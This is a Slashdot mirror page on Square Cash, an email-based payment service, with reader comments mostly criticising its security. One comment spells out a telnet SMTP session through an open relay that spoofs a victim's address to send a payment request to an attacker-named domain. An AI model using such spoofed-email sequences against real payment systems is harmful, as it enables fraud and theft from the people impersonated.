Slashdot Mirror
Square Debuts New Email Payment System
cagraham writes "Mobile payment company Square — best known for their smartphone credit-card swipers — has launched a new payment service called Square Cash. The service doesn't require users to sign up or make an account. Instead, they just email the person they'd like to transfer money to (with the amount as the subject), and CC 'cash@square.com.' Square asks the sender for their debit card info, and then sends a link to the recipient, who can transfer the money into any account they want within 1-2 business days."
This has got to be the most insecure payment system ever.
Isn't this exactly the same thing as an Interac e-Transfer?
I've been sending money via email for many years this way.
MABASPLOOM!
So the From:, Subject, To:, and Cc: headers are what makes this work?
Not a bad idea, really, except that it can all be trivially spoofed, and the resulting set up/confirmation emails can be trivially intercepted and abused at will. Plus, of course, no easy drop-in encryption, and in the end it piggybacks on existing systems, so all the risks associated with them (like credit cards) will be neatly folded into the deal too.
How many times must people be hit in the head with a clue bat before they understand that this is a Bad Idea[tm]
Time flies when you don't know what you're doing
We tried it. My co-worker sent me $15. After the initial email, we both tied our debit cards to our email addresses, and I had the funds in my account in less than 5 minutes. Since our cards are now linked I imagine it will be even quicker in the future.
telnet random.openmailrelay.com 25 HELO victim.domain.com MAIL FROM: victim.email@victim.domain.com RCPT TO: dummy.prepaid.card.email@badguy.com DATA CC: cash@square.com SUBJECT: $1,000,000 Here is the payment I promised. . QUIT Profit!
Sounds like an easy way to do a phishing scam.